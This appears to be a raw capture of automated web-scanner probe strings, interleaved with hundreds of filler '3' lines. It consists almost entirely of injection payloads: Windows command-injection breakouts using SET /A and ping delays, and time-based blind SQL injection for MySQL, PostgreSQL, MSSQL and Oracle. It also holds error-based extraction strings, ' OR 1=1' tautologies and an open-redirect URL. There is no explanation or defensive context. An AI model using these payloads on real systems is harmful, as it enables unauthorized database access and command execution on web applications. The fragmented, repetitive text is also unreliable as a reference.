http://r87.com/n?.aspx

| SET /A 0xFFF9999-55849

3

http://r87.com/n?.aspx

SET /A 0xFFF9999-47298

SET /A 0xFFF9999-62306

|ping -n 25 127.0.0.1

3

hTTp://r87.com/n

3

SET /A 0xFFF9999-53223 &

ping -w 25 127.0.0.1

3

3

3

SET /A 0xFFF9999-16482 &

ping -n 25 127.0.0.1

3

3

& SET /A 0xFFF9999-35273 &

ping -w 25 127.0.0.1 &

3

3

& SET /A 0xFFF9999-77115 &

3

&ping -w 25 127.0.0.1 &

3

3

'& SET /A 0xFFF9999-88698 &

3

'&ping -w 25 127.0.0.1 &'

3

'& SET /A 0xFFF9999-49847 &

3

3

"&ping -w 25 127.0.0.1 &"

3

"& SET /A 0xFFF9999-72486 &

3

3

"& SET /A 0xFFF9999-56517 &

ping -n 25 127.0.0.1 &

3

& ping -n 25 127.0.0.1 &

3

3

3

3

3

3

'& ping -n 25 127.0.0.1 &

3

3

3

3

"& ping -n 25 127.0.0.1 &

3

3

|ping -n 25 127.0.0.1

3

3

3

3

ping -w 25 127.0.0.1

3

3

ping -n 25 127.0.0.1

3

ping -w 25 127.0.0.1 &

3

3

&ping -w 25 127.0.0.1 &

3

3

'&ping -w 25 127.0.0.1 &'

3

"&ping -w 25 127.0.0.1 &"

3

3

ping -n 25 127.0.0.1 &

3

& ping -n 25 127.0.0.1 &

3

3

3

3

'& ping -n 25 127.0.0.1 &

3

"& ping -n 25 127.0.0.1 &

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1

3

-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"

3

3

-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))

3

-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'

3

3

'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'

3

((SELECT(1)FROM(SELECT(SLEEP(25)))A))

3

3

));SELECT pg_sleep(25)--

3

'));SELECT pg_sleep(25)--

3

3

');SELECT pg_sleep(25)--

3

3

);SELECT pg_sleep(25)--

3

SELECT pg_sleep(25)--

3

3

;SELECT pg_sleep(25)--

3

3

';SELECT pg_sleep(25)--

3

1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1

3

3

3

1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '

3

(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)

3

3

((select sleep(25)))a-- 1

3

3

-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1

3

3

+ ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/

3

syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

3

3

1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

3

3

1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

3

1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

3

3

1)) WAITFOR DELAY '0:0:25'--

3

')) WAITFOR DELAY '0:0:25'--

3

3

') WAITFOR DELAY '0:0:25'--

3

1) WAITFOR DELAY '0:0:25'--

3

3

WAITFOR DELAY '0:0:25'--

3

1 WAITFOR DELAY '0:0:25'--

3

3

' WAITFOR DELAY '0:0:25'--

3

3

') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1

-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"

3

-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))

-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'

3

'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'

((SELECT(1)FROM(SELECT(SLEEP(25)))A))

3

3));SELECT pg_sleep(25)--

3

3'));SELECT pg_sleep(25)--

3');SELECT pg_sleep(25)--

3

3);SELECT pg_sleep(25)--

3

SELECT pg_sleep(25)--

3;SELECT pg_sleep(25)--

3

3';SELECT pg_sleep(25)--

1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1

3

1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '

3

(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)

((select sleep(25)))a-- 1

3

-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1

3 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/

3

syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

3

1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

3

1)) WAITFOR DELAY '0:0:25'--

3

3

')) WAITFOR DELAY '0:0:25'--

3

3

') WAITFOR DELAY '0:0:25'--

-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1

3

1) WAITFOR DELAY '0:0:25'--

-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

3

WAITFOR DELAY '0:0:25'--

'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'

3

1 WAITFOR DELAY '0:0:25'--

' WAITFOR DELAY '0:0:25'--

'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'

3

3

(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))

3

1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1

3

3

3

-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

3

3

(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

3

'+NSFTW+'

3

3

3

NSFTW

3

(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)

3

3

'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

3

3

3

cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)

3

3

(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))

3

3

-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"

3

3

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

3

3

-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

3

3

'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='

3

3

convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))

3

3

'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'

3

3

(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)

3

3

%27

3

3

-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1

3

-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

3

'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'

3

'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'

3

(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))

3

1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1

3

-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

3

(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

3

'+NSFTW+'

3

NSFTW

3

3

(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)

3

'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

3

cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)

3

(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))

3

-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

3

-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

3

'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='

3

convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))

3

3

'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'

3

(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)

3

%27

3

3

3

" OR 1=1 OR "1"="1

3

" OR 1=1 OR "1"="1

3

3

' OR 1=1 OR '1'='1

3

3

' OR 1=1 OR '1'='1

3

OR X='ss

3

3

3

-1 OR 17-7=10

3

" OR 1=1 OR "ns"="ns

3

3

' OR 1=1 OR 'ns'='ns

3

AND 'NS='ss

3

3

NS NO

3

3

'

3

3

-1 OR 1=1

3

-1 OR 1=1

3

-1 OR 1=1

3

3

3

-1 OR 1=1

3

3" OR 1=1 OR "1"="1

3" OR 1=1 OR "1"="1

3

3

3' OR 1=1 OR '1'='1

3' OR 1=1 OR '1'='1

3 OR X='ss

3

3

3 OR 17-7=10

3" OR 1=1 OR "ns"="ns

3

3' OR 1=1 OR 'ns'='ns

3

3 AND 'NS='ss

NS3NO

3

'

3 OR 1=1

3

3 OR 1=1

3

3 OR 1=1

3 OR 1=1

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3